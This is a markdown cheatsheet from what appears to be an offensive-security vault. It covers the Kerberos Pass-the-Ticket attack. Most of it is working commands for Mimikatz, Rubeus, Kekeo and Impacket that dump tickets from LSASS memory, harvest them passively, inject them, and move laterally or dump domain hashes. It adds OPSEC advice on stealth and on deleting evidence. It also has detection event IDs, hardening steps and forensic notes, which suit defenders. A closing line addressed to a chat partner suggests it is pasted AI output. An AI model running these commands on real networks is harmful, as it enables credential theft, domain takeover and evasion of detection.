daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-5-pass-the-ticket-ptt.md (25345B)


      1 ---
      2 title: "Attack #5 β€” Pass-the-Ticket (PtT)"
      3 description: "Pass-the-Ticket is a Kerberos credential theft and replay attack where an attacker extracts a valid Kerberos ticket β€” either a Ticket Granting Ticket…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "kerberos", "ntlm", "hashing"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #5 β€” Pass-the-Ticket (PtT).md"
     11 ---
     12 # πŸ”΄ Attack #5 β€” Pass-the-Ticket (PtT)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Pass-the-Ticket is a **Kerberos credential theft and replay attack** where an attacker extracts a valid Kerberos ticket β€” either a Ticket Granting Ticket (TGT) or a Ticket Granting Service (TGS) ticket β€” directly from LSASS memory on a compromised host, then injects it into their own session to impersonate the victim. Unlike Pass-the-Hash which abuses NTLM, PtT operates entirely within the Kerberos protocol β€” meaning it works even in environments where NTLM has been disabled, and critically, **it can bypass MFA** because the ticket is already authenticated and cryptographically valid.
     19 
     20 The key distinction is what you steal and how you use it. A stolen **TGT** is the golden prize β€” it acts as a master pass, allowing the attacker to request TGS service tickets for **any resource** the victim has access to, for the remaining lifetime of the ticket (typically 10 hours). A stolen **TGS** is more limited β€” it grants access only to the specific service it was issued for, but requires no further interaction with the DC.
     21 
     22 > ⚠️ **Windows Server 2022+ / Credential Guard:** On systems with Credential Guard enabled, Kerberos tickets are isolated in the Virtual Secure Mode (VSM) and cannot be extracted from LSASS memory via traditional dumping tools like Mimikatz or Rubeus. The ticket injection attack still works if you have tickets from an older system, but extraction becomes impossible on hardened hosts. See "Hardening Commands" below for details.
     23 
     24 ### TGT vs TGS β€” What to Steal and When
     25 
     26 | Property | TGT (Ticket Granting Ticket) | TGS (Service Ticket) |
     27 |---|---|---|
     28 | **Issued by** | KDC (AS-REP) | KDC (TGS-REP) |
     29 | **Encrypted with** | KRBTGT hash | Target service account hash |
     30 | **Grants access to** | **Any service in the domain** | Only the specific service it was issued for |
     31 | **Lifetime** | 10 hours (renewable for 7 days) | Typically 10 hours |
     32 | **Value** | Extremely high β€” full domain access | Moderate β€” single service access |
     33 | **Where found** | LSASS memory of logged-in user | LSASS memory + Windows ticket cache |
     34 
     35 ### The Full Attack Flow
     36 
     37 ```
     38 1. Gain foothold + local admin on any domain-joined Windows host
     39 2. Dump Kerberos tickets from LSASS memory (Mimikatz / Rubeus)
     40 3. Identify high-value TGTs (Domain Admins, service accounts, admin users)
     41 4. Export ticket to .kirbi file OR base64 blob
     42 5. Inject ticket into own session (kerberos::ptt / Rubeus ptt)
     43 6. Authenticate to domain resources AS the victim β€” no password needed
     44 7. MFA is bypassed β€” ticket is already authenticated
     45 ```
     46 
     47 ***
     48 
     49 ## βš™οΈ Prerequisites
     50 
     51 | Requirement | Detail |
     52 |---|---|
     53 | **Local admin / SYSTEM on host** | Required to read LSASS memory where tickets are cached |
     54 | **Active user sessions** | Victim user must be currently logged in (or recently logged in) β€” their TGT must be in memory |
     55 | **Kerberos reachable** | Port 88 (Kerberos) must be accessible to inject and use the ticket |
     56 | **Ticket validity window** | TGT must still be valid (10-hour default lifetime) β€” expired tickets are useless |
     57 | **Linux users** | Tickets stored in ccache files (`/tmp/krb5cc_*`) β€” readable if you control the process/user |
     58 
     59 ***
     60 
     61 ## πŸ› οΈ Tools
     62 
     63 | Tool | Platform | Notes |
     64 |---|---|---|
     65 | **Mimikatz** | Windows | `sekurlsa::tickets /export` + `kerberos::ptt` β€” the original PtT toolset |
     66 | **Rubeus** | Windows | Superior modern tool β€” dump, triage, inject, monitor all in one |
     67 | **Impacket** | Linux | `ticketer.py`, `getST.py`, `getTGT.py` β€” full Kerberos ticket toolkit |
     68 | **CrackMapExec / NetExec** | Linux | `--use-kcache` flag to authenticate with ccache ticket |
     69 | **Evil-WinRM** | Linux | Accepts KRB5CCNAME environment variable for ticket-based auth |
     70 | **Kekeo** | Windows | Alternative to Mimikatz for ticket manipulation |
     71 | **ticketConverter.py** | Linux | Converts `.kirbi` (Windows) ↔ `.ccache` (Linux) format β€” critical for cross-platform use |
     72 
     73 ***
     74 
     75 ## πŸ’» Full Commands
     76 
     77 ### πŸ”΅ Step 0 β€” Enumerate Tickets in Memory (Reconnaissance)
     78 
     79 ```powershell
     80 # Windows β€” built-in, list current session's tickets
     81 klist
     82 
     83 # Windows β€” list all tickets in all sessions (requires admin)
     84 klist sessions
     85 
     86 # Rubeus β€” list and triage all tickets across all sessions
     87 .\Rubeus.exe triage
     88 
     89 # Rubeus β€” list all tickets with full detail (times, encryption type, flags)
     90 .\Rubeus.exe dump /nowrap
     91 
     92 # Mimikatz β€” list all tickets
     93 kerberos::list
     94 kerberos::list /export
     95 ```
     96 
     97 ***
     98 
     99 ### πŸ”΄ Mimikatz β€” Dump & Inject Tickets (Windows)
    100 
    101 ```powershell
    102 # ── STEP 1: Dump all tickets from LSASS ──────────────────────────────────────
    103 
    104 privilege::debug
    105 
    106 # List all Kerberos tickets in memory
    107 sekurlsa::tickets
    108 
    109 # Export ALL tickets to .kirbi files in current directory
    110 sekurlsa::tickets /export
    111 
    112 # ── STEP 2: Inspect exported tickets ─────────────────────────────────────────
    113 # Files will be named: [0;XXXXXX]-0-0-40e10000-Administrator@krbtgt-CORP.LOCAL.kirbi
    114 # The filename contains: [LUID]-[flags]-[enctype]-[username]@[service]-[domain]
    115 
    116 # ── STEP 3: Inject a specific ticket into current session ────────────────────
    117 kerberos::ptt [0;XXXXXX]-0-0-40e10000-Administrator@krbtgt-CORP.LOCAL.kirbi
    118 
    119 # Inject multiple tickets at once (glob pattern)
    120 kerberos::ptt *.kirbi
    121 
    122 # ── STEP 4: Verify injection ─────────────────────────────────────────────────
    123 kerberos::list
    124 
    125 # ── STEP 5: Use the injected ticket ──────────────────────────────────────────
    126 # From cmd.exe β€” access resources as the injected user
    127 dir \\DC01\C$
    128 dir \\fileserver01\shares$
    129 psexec.exe \\DC01 cmd.exe
    130 ```
    131 
    132 ***
    133 
    134 ### πŸ”΄ Rubeus β€” Full PtT Workflow (Windows β€” Recommended)
    135 
    136 ```powershell
    137 # ── Dump tickets from all sessions (base64 + decoded) ────────────────────────
    138 .\Rubeus.exe dump /nowrap
    139 
    140 # Dump tickets for a specific LUID (logon session)
    141 .\Rubeus.exe dump /luid:0x3e7 /nowrap
    142 
    143 # Dump only TGT tickets (filter for krbtgt service)
    144 .\Rubeus.exe dump /service:krbtgt /nowrap
    145 
    146 # ── Export ticket to .kirbi file ──────────────────────────────────────────────
    147 .\Rubeus.exe dump /luid:0x3e7 /service:krbtgt /nowrap > ticket_b64.txt
    148 
    149 # ── Inject ticket from base64 blob ────────────────────────────────────────────
    150 .\Rubeus.exe ptt /ticket:<base64_encoded_ticket>
    151 
    152 # Inject from .kirbi file
    153 .\Rubeus.exe ptt /ticket:Administrator.kirbi
    154 
    155 # ── Verify the ticket is injected ─────────────────────────────────────────────
    156 .\Rubeus.exe triage
    157 klist
    158 
    159 # ── Monitor for new tickets being created (real-time harvest) ────────────────
    160 .\Rubeus.exe monitor /interval:5 /nowrap
    161 
    162 # Auto-harvest and inject new TGTs as they appear (e.g., admin logs in nearby)
    163 .\Rubeus.exe harvest /interval:30
    164 
    165 # ── Request a TGS using the injected TGT (access specific service) ────────────
    166 .\Rubeus.exe asktgs /ticket:<base64_TGT> /service:cifs/DC01.corp.local /nowrap /ptt
    167 .\Rubeus.exe asktgs /ticket:<base64_TGT> /service:host/DC01.corp.local /nowrap /ptt
    168 ```
    169 
    170 ***
    171 
    172 ### πŸ”΄ Kekeo β€” Alternative Ticket Injection (Windows)
    173 
    174 ```powershell
    175 # ── Dump and export tickets with Kekeo ─────────────────────────────────────
    176 .\kekeo.exe
    177 tkt::list
    178 
    179 # Export specific ticket to .kirbi
    180 tkt::export ::0 output.kirbi
    181 
    182 # Inject ticket into current session
    183 tkt::ptt ::output.kirbi
    184 ```
    185 
    186 ***
    187 
    188 ### πŸ”΄ Linux β€” ccache Ticket Workflow (Impacket + NetExec)
    189 
    190 ```bash
    191 # ── Convert .kirbi (Windows) β†’ .ccache (Linux) ───────────────────────────────
    192 ticketConverter.py Administrator.kirbi Administrator.ccache
    193 
    194 # Convert .ccache β†’ .kirbi (reverse direction)
    195 ticketConverter.py Administrator.ccache Administrator.kirbi
    196 
    197 # ── Set ticket for use by Impacket tools ─────────────────────────────────────
    198 export KRB5CCNAME=/tmp/Administrator.ccache
    199 
    200 # ── Use ticket with Impacket tools ───────────────────────────────────────────
    201 
    202 # psexec with ticket (no password)
    203 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    204 
    205 # wmiexec with ticket
    206 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    207 
    208 # smbexec with ticket
    209 smbexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    210 
    211 # secretsdump with ticket (dump all domain hashes)
    212 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
    213 
    214 # smbclient β€” browse shares
    215 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local
    216 
    217 # ── NetExec with ticket ───────────────────────────────────────────────────────
    218 export KRB5CCNAME=/tmp/Administrator.ccache
    219 nxc smb DC01.corp.local --use-kcache
    220 nxc smb DC01.corp.local --use-kcache -x whoami
    221 nxc winrm DC01.corp.local --use-kcache
    222 
    223 # ── Evil-WinRM with ticket ────────────────────────────────────────────────────
    224 export KRB5CCNAME=/tmp/Administrator.ccache
    225 evil-winrm -i DC01.corp.local -r corp.local
    226 ```
    227 
    228 ***
    229 
    230 ### πŸ”΄ Impacket β€” Request TGT from Scratch (If You Have Creds/Hash)
    231 
    232 ```bash
    233 # Request TGT using plaintext credentials (saves as .ccache)
    234 getTGT.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10
    235 
    236 # Request TGT using NT hash (Overpass-the-Hash style)
    237 getTGT.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c -dc-ip 10.10.10.10
    238 
    239 # Request TGT using AES key (stealthiest β€” no RC4 downgrade)
    240 getTGT.py corp.local/Administrator -aesKey <AES256_KEY> -dc-ip 10.10.10.10
    241 
    242 # Export the TGT and use it
    243 export KRB5CCNAME=Administrator.ccache
    244 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    245 ```
    246 
    247 ***
    248 
    249 ### πŸ”΄ Requesting Specific Service Tickets (TGS via PtT)
    250 
    251 ```bash
    252 # Get a service ticket for CIFS (file shares) using a TGT
    253 getST.py corp.local/Administrator -k -no-pass -spn cifs/DC01.corp.local -dc-ip 10.10.10.10
    254 
    255 # Get a TGS for HOST service (PSExec, remote commands)
    256 getST.py corp.local/Administrator -k -no-pass -spn host/DC01.corp.local -dc-ip 10.10.10.10
    257 
    258 # Get a TGS for LDAP (BloodHound, DCSync)
    259 getST.py corp.local/Administrator -k -no-pass -spn ldap/DC01.corp.local -dc-ip 10.10.10.10
    260 
    261 # Impersonate another user via S4U2Self/S4U2Proxy (covered in Attack #16 β€” Constrained Delegation)
    262 getST.py corp.local/svc_account -k -no-pass -spn cifs/DC01.corp.local -impersonate Administrator
    263 ```
    264 
    265 ***
    266 
    267 ### πŸ”΄ Harvesting Tickets Passively (Real-Time Collection)
    268 
    269 ```powershell
    270 # Rubeus β€” monitor for new TGTs every 5 seconds, output in base64
    271 .\Rubeus.exe monitor /interval:5 /nowrap
    272 
    273 # Rubeus β€” harvest TGTs and automatically inject them every 30 seconds
    274 .\Rubeus.exe harvest /interval:30
    275 
    276 # Ideal scenario: Run on a host where admins frequently log in
    277 # Rubeus silently captures their TGTs as they authenticate
    278 ```
    279 
    280 ***
    281 
    282 ## 🎯 OPSEC Tips
    283 
    284 - **Prefer TGT theft over TGS theft** β€” a TGT gives full access; a TGS only buys you one service
    285 - **Use Rubeus `/nowrap`** at all times β€” corrupted base64 from line wrapping is the most common failure point
    286 - **Use AES tickets over RC4** β€” if you can request AES TGTs, they draw far less attention than RC4 tickets in AES-enforced environments
    287 - **Rubeus `monitor`** is your silent sentry β€” deploy it on a server where privileged users log in and let it harvest TGTs passively without any repeated LSASS access
    288 - **Check ticket lifetime before injecting** β€” a 9-hour-old TGT with 1 hour left is useless for a long operation; `klist` shows the expiry time
    289 - **Use FQDN not IP** when authenticating with Kerberos tickets β€” Kerberos doesn't work over raw IPs; always use `DC01.corp.local` not `10.10.10.10`
    290 - **Convert kirbi ↔ ccache correctly** β€” the most common mistake when moving between Windows tooling and Linux Impacket is forgetting this conversion step
    291 
    292 ### OpSec Ranking by Stealth
    293 
    294 | Method | Stealth | Speed | Notes |
    295 |---|---|---|---|
    296 | **Rubeus harvest + monitor** | ⭐⭐⭐⭐⭐ | Fast | Passive, no LSASS access on repeat β€” deploy and forget |
    297 | **Rubeus dump + ptt (base64)** | ⭐⭐⭐⭐ | Fast | Single LSASS access, quick injection β€” 2-3 minutes total |
    298 | **Mimikatz sekurlsa::tickets + ptt** | ⭐⭐⭐ | Medium | Older signature, still detectable, multiple Mimikatz invocations |
    299 | **Extracting from Linux ccache** | ⭐⭐⭐⭐⭐ | Fast | Off-network ticket use β€” no DC communication needed |
    300 | **Kekeo ticket dumping** | ⭐⭐⭐⭐ | Medium | Less common than Mimikatz/Rubeus, lower detection baseline |
    301 
    302 ### Time-to-Execute Estimates
    303 
    304 - **Full PtT with Rubeus (dump β†’ verify β†’ inject β†’ access resource):** 3 minutes
    305 - **Passive harvest via Rubeus monitor (waiting for admin to log in):** 5–60 minutes (depends on target presence)
    306 - **Linux ccache workflow (after tickets transferred):** 2 minutes
    307 - **Kekeo ticket manipulation:** 2–4 minutes
    308 
    309 ### Tool Version Compatibility
    310 
    311 - **Rubeus v1.6.4+:** Supports `/ptt` injection, `/dump`, `/monitor` reliably; no major breaking changes
    312 - **Mimikatz 2.2.0+:** Standard sekurlsa commands stable; Kerberos operations work cross-Windows versions
    313 - **Impacket (current):** ticketConverter, psexec, wmiexec all Kerberos-capable; requires Python 3.6+
    314 - **NetExec latest:** `--use-kcache` stable; works with ccache format from all sources
    315 - **Evil-WinRM v4.0+:** KRB5CCNAME support stable; requires Kerberos library installed on Linux
    316 
    317 ***
    318 
    319 ## πŸ›‘οΈ Detection β€” Event IDs
    320 
    321 | Event ID | Source | What to Look For |
    322 |---|---|---|
    323 | **4768** | Security Log | TGT requested β€” baseline normal, but flag if requestor IP doesn't match the account's usual workstation |
    324 | **4769** | Security Log | TGS requested β€” watch for the **same TGT being used from two different IP addresses** simultaneously |
    325 | **4770** | Security Log | TGT renewal β€” unusual renewal from an unexpected host |
    326 | **4624** | Security Log | Logon Type 3 with Kerberos β€” compare source IP to known workstation of that user |
    327 | **4648** | Security Log | Logon with explicit credentials β€” attacker using injected ticket to access remote resource |
    328 | **Sysmon EID 10** | Sysmon | LSASS process access β€” ticket extraction precursor (same as PtH detection) |
    329 | **Sysmon EID 1** | Sysmon | `Rubeus.exe` or `mimikatz.exe` process creation (signature-based) |
    330 
    331 **Primary detection signature:** A TGT or TGS ticket being used from a **different IP address or machine** than the one that originally requested it. This is a near-definitive indicator of Pass-the-Ticket. Modern SIEMs can correlate the 4768 (ticket request origin) with subsequent 4769 (service ticket usage) and flag the discrepancy.
    332 
    333 ***
    334 
    335 ## 🧩 Troubleshooting
    336 
    337 | Error | Cause | Fix |
    338 |---|---|---|
    339 | `KRB_AP_ERR_SKEW` | System time skew between attacker and DC (>5 min) | Sync attacker system time with DC: `net time \\DC01 /set` or `timedatectl set-ntp true` |
    340 | `KDC_ERR_ETYPE_NOSUPP` | Encryption type not supported (e.g., AES requested but only RC4 available) | Specify correct etype: RC4 = etype 23, AES256 = etype 18; check domain policy |
    341 | `KRB5_CC_BADFORMAT` | Corrupted or malformed .ccache file | Regenerate ticket via getTGT.py; verify .kirbi→ccache conversion with `ticketConverter.py` |
    342 | `KDC_ERR_PREAUTH_FAILED` | NT hash/AES key is incorrect or account is disabled | Verify hash from LSASS dump matches actual account; check account lockout in AD |
    343 | `ERR_KRB5_KDC_UNREACH` | Cannot reach KDC on port 88 (firewall, routing, or bad DNS) | Test connectivity: `nc -zv DC01.corp.local 88`; verify DNS resolves DC FQDN to correct IP |
    344 | `Ticket expired` | TGT/TGS lifetime exceeded | Check ticket validity with `klist`; extract fresh ticket from active user session |
    345 | `LSASS dump returns zero tickets` | No Kerberos tickets in memory (user has no active session or Credential Guard enabled) | Ensure user is actively logged in; on Win2022+ with Credential Guard, extraction is not possible |
    346 | `Base64 corruption from Rubeus /dump` | Line-wrapping in terminal output | Always use `/nowrap` flag to prevent line breaks: `.\Rubeus.exe dump /nowrap > output.txt` |
    347 
    348 ***
    349 
    350 ## πŸ—ΊοΈ MITRE ATT&CK
    351 
    352 **Technique:** T1550.003 β€” Use Alternate Authentication Material: Pass the Ticket
    353 **Tactic:** TA0008 β€” Lateral Movement
    354 
    355 ### Known APT Groups Using PtT
    356 
    357 - **APT29 (Cozy Bear):** Leverages PtT for domain persistence and lateral movement post-compromise
    358 - **FIN6 (Magecart operators):** Uses PtT to move laterally within compromised environments after initial foothold
    359 - **Wizard Spider (Conti operators):** Employs PtT for rapid lateral movement during ransomware operations
    360 - **HAFNIUM (State-sponsored, China-based):** Combines PtT with ProxyShell exploitation for Exchange compromise chains
    361 
    362 **Detection baseline:** Organizations using Defender for Identity should flag "Suspicious Kerberos ticket usage" (multiple TGS requests from single source IP in short window) as a high-confidence PtT indicator.
    363 
    364 ***
    365 
    366 ## πŸ›‘οΈ Advanced Detection & Hardening
    367 
    368 ### Sigma Rule References
    369 
    370 - **Sigma Rule: PtT via Rubeus/Mimikatz** β€” Monitor for tool execution + 4768 requests within 60 seconds
    371 - **Sigma Rule: Abnormal TGS usage** β€” Correlate 4769 events to 4768 origin; flag if source IP differs
    372 - **Sigma Rule: LSASS dumping + Kerberos activity** β€” Sysmon EID 10 (LSASS access) followed by 4768 within 2 minutes
    373 
    374 ### EDR Detections (Defender for Identity)
    375 
    376 - **"Unusual Kerberos ticket usage"** β€” When a ticket created on one host is used on a different host
    377 - **"Sensitive group membership modification"** β€” If attacker uses PtT to escalate into DA/EA/BA groups
    378 - **"Remote code execution via Kerberos ticket"** β€” Combination of ticket injection + lateral movement in same session
    379 
    380 ### Hardening Commands
    381 
    382 ```powershell
    383 # ── Enable Credential Guard (Windows Server 2016+) ────────────────────────────
    384 # Block LSASS memory access entirely β€” prevents ALL ticket extraction
    385 dism /online /enable-feature /featurename:IsolatedUserMode
    386 
    387 # ── Enforce Protected Users group (DC enforcement) ───────────────────────────
    388 # Members cannot use NTLM or DES; forces AES/RC4 only
    389 Add-ADGroupMember -Identity "Protected Users" -Members "CN=Administrator,CN=Users,DC=corp,DC=local"
    390 
    391 # ── Set short TGT lifetime via GPO (reduce ticket reuse window) ───────────────
    392 # Group Policy > Computer Configuration > Policies > Windows Settings > Security Settings
    393 # > Kerberos Policy > Maximum lifetime for user ticket = 4 hours (default 10)
    394 # Command to check current policy:
    395 gpresult /h report.html
    396 # Look for: "Maximum lifetime for user ticket"
    397 
    398 # ── Enable AES-only enforcement (disable RC4 in Kerberos) ────────────────────
    399 # On DC: Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\Parameters" -Name "SupportedEncryptionTypes" -Value 28
    400 # 28 = AES128 + AES256 only (RC4 disabled)
    401 
    402 # ── Set account lockout + login attempt monitoring ────────────────────────────
    403 # Via GPO: Account Policies > Account Lockout Policy
    404 # Threshold: 3–5 failed attempts; Duration: 30 minutes
    405 ```
    406 
    407 ### Forensic Artifacts (What Survives Where)
    408 
    409 | Artifact | Location | Survives Cleanup | Notes |
    410 |---|---|---|---|
    411 | **Kerberos .kirbi files** | `C:\Windows\Temp\` or current dir | Temporary β€” deleted if cleanup run | Recovered via DFIR tools if not overwritten |
    412 | **Event Log 4768/4769** | Security Event Log | Yes (unless log cleared) | Primary detection source; correlate origin IP vs. usage IP |
    413 | **LSASS memory dump** | Pagefile, hiberfil.sys, DRAM | If not cleared | Volatility/WinDbg analysis can recover dumped tickets post-reboot |
    414 | **Rubeus/Mimikatz process execution** | Sysmon EID 1, MFT | Sysmon/Event logs persist | Signatures detect tool execution; MFT shows creation timestamp |
    415 | **ccache file (Linux)** | `/tmp/krb5cc_*` or `.kerberos/cache` | No β€” cleanup removes | Immediate deletion after ticket use is OPSEC best practice |
    416 | **Registry RunKeys** | HKLM\Software\Microsoft\Windows\Run | Yes | If attacker persists via scheduled task or RunKey, it persists |
    417 | **User environment variables** | User registry hive | Yes | If KRB5CCNAME set in environment, survives session |
    418 
    419 ***
    420 
    421 ## πŸ”— Attack Chain Context
    422 
    423 ```
    424 [Pass-the-Ticket] ──→ Full Domain Access as Victim User (no password needed)
    425          β”‚
    426          β”œβ”€β”€β†’ 🩸 DCSync β€” inject DA's TGT β†’ request LDAP TGS β†’ DCSync all hashes
    427          β”œβ”€β”€β†’ 🎫 Golden Ticket β€” if KRBTGT hash obtained, forge unlimited TGTs
    428          β”œβ”€β”€β†’ 🎫 Silver Ticket β€” forge TGS without touching KDC (Attack #12)
    429          β”œβ”€β”€β†’ πŸ” Overpass-the-Hash β€” convert NT hash into a TGT on the fly (Attack #6)
    430          β”œβ”€β”€β†’ πŸ“ Access any file share, database, mailbox as the victim
    431          └──→ 🎯 Rubeus harvest β†’ wait for DA to log in β†’ instant privilege escalation
    432 ```
    433 
    434 ### Cross-References to Related Attacks
    435 
    436 - **Attack #4 β€” Pass-the-Hash (PtH):** Uses NTLM directly; PtT is the Kerberos equivalent and often preferred
    437 - **Attack #6 β€” Overpass-the-Hash (OPtH):** Converts NT hash to TGT; output is then used with PtT techniques
    438 - **Attack #11 β€” Golden Ticket:** If you obtain KRBTGT hash via DCSync, forge unlimited TGTs instead of stealing individual ones
    439 - **Attack #12 β€” Silver Ticket:** Similar to PtT but forges service-specific tickets without KDC interaction
    440 - **Attack #16 β€” Constrained Delegation (S4U2Self/S4U2Proxy):** Uses TGTs to request tickets on behalf of other users
    441 
    442 ### PtH vs PtT β€” Know When to Use Which
    443 
    444 | Scenario | Use PtH | Use PtT |
    445 |---|---|---|
    446 | NTLM enabled, Kerberos optional | βœ… | βœ… |
    447 | NTLM disabled / Kerberos-only | ❌ | βœ… |
    448 | MFA enabled on target account | βœ… (bypasses MFA) | βœ… (bypasses MFA) |
    449 | Only have NT hash, no session | βœ… | ❌ (need existing ticket) |
    450 | Victim currently logged in nearby | βœ… | βœ… (harvest their TGT) |
    451 | Need to access specific Kerberos service | ❌ | βœ… |
    452 | Cross-domain / forest access | ❌ | βœ… (inter-realm TGTs) |
    453 
    454 ***
    455 
    456 > βœ… **Attack #5 β€” Pass-the-Ticket complete.** Tell me to move on when you're ready for **Attack #6 β€” Overpass-the-Hash (Pass-the-Key)**.
    457 
    458 Sources
    459  Pass-the-Ticket (PtT) Attacks Explained: Detection, Impact & Mitigation https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/pass-the-ticket-attack/
    460  What is a Pass-the-Ticket Attack? Detection & Prevention - Cymulate https://cymulate.com/cybersecurity-glossary/pass-the-ticket-attack/
    461  Pass the Ticket Attack Explained - MITRE ATT&CK T1550.003 https://www.picussecurity.com/resource/blog/t1550.003-pass-the-ticket-adversary-use-of-alternate-authentication
    462  How to Defend Against a Pass the Ticket Attack: AD Security 101 https://www.semperis.com/blog/how-to-defend-against-pass-the-ticket-attack/
    463  Active Directory Attacks: Pass-the-Hash, Pass-the-Ticket & Qualys ... https://blog.qualys.com/product-tech/2026/02/11/qualys-etm-detect-pass-the-hash-pass-the-ticket-attacks
    464  Pass-the-Ticket Attacks | BeyondTrust https://www.beyondtrust.com/resources/glossary/what-are-pass-the-ticket-attacks
    465  Pass-the-Ticket (PtT) Attacks Explained: Detection, Impact ... https://netwrix.com/ko/cybersecurity-glossary/cyber-security-attacks/pass-the-ticket-attack/
    466  What are Pass-the-Hash (PtH) & Pass-the-Ticket (PtT)? https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-are-pass-the-hash-pth-pass-the-ticket-ptt/
    467  Use Alternate Authentication Material: Pass the Ticket https://attack.mitre.org/techniques/T1550/003/
    468  What Is Pass the Ticket? How It Works & Examples - Twingate https://www.twingate.com/blog/glossary/pass%20the%20ticket